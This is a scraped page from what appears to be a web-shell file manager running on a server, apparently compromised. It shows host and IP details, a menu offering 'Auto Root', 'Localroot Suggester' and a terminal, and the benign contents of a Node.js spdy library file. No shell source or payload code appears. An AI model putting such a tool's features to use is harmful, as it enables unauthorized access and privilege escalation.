Linux unitednationsplay.com 3.10.0-1160.45.1.el7.x86_64 #1 SMP Wed Oct 13 17:20:51 UTC 2021 x86_64
nginx/1.20.1
Server IP : 188.130.139.92 & Your IP : 18.188.73.229
Domains :
Cant Read [ /etc/named.conf ]
User : web
Terminal
Auto Root
Create File
Create Folder
Localroot Suggester
Backdoor Destroyer
Readme
/
home /
www /
unp_probe /
node_modules /
spdy /
lib /
spdy /
Delete
Unzip
Name
Size
Permission
Date
Action
agent.js
6.61
KB
-rw-r--r--
2017-05-23 01:55
handle.js
5.77
KB
-rw-r--r--
2017-05-23 01:27
request.js
527
B
-rw-r--r--
2017-05-23 01:16
response.js
2.85
KB
-rw-r--r--
2017-05-23 01:16
server.js
7.3
KB
-rw-r--r--
2017-05-23 01:55
socket.js
921
B
-rw-r--r--
2017-05-23 01:27
Save
Rename
'use strict' function attachPush (req) { var handle = req.socket._handle handle.getStream(function (stream) { stream.on('pushPromise', function (push) { req.emit('push', push) }) }) } exports.onNewListener = function onNewListener (type) { var req = this if (type !== 'push') { return } // Not first listener if (req.listeners('push').length !== 0) { return } if (!req.socket) { req.on('socket', function () { attachPush(req) }) return } attachPush(req) }